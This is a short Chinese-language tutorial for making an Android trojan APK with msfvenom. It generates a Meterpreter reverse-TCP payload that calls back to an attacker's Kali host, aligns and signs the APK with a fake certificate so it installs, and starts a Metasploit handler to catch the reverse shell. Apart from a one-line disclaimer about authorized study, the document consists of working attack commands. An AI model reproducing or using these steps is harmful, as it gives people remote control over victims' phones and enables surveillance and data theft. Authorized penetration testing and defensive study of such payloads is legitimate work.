2023.9.12
注意:在进行安全研究和学习时,请确保遵循相关法律法规并获得授权,以避免非法操作或侵犯他人隐私。这些步骤仅供学习和研究使用,不得用于非法用途。
一、生成文件
1、利用 kali 的工具 msfvenom 生成一个木马文件
msfvenom -p android/meterpreter/reverse_tcp lhost=<kali ip> lport=<自定义端口> R > muma.apk
二、重新对齐、签名
1、赋予apk文件权限
chmod -R 777 muma.apk
ps:查看文件权限
ll muma.apk
2、安装 zipalign
apt-get install zipalign
3、重新对apk文件进行对齐,签名成一个新的apk文件
zipalign -v 4 muma.apk new_muma.apk
4、生成密钥对
keytool -genkey -v -keystore <密钥库名> -alias <密钥别名> -keyalg RSA -keysize <秘钥位数> -validity <有效天数>
5、安装证书签名命令
apt-get install apksigner
6、对 apk 签名 ps:做假证书签名的时候要输入之前做的假证书的密码
apksigner sign --ks <密钥库名> --ks-key-alias <密钥别名> <木马文件名>
7、验证签名
apksigner verify -v --print-certs <木马文件名>
三、测试
1、msf模块运行
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <kali ip>
set lport <和木马软件的端口一样>
run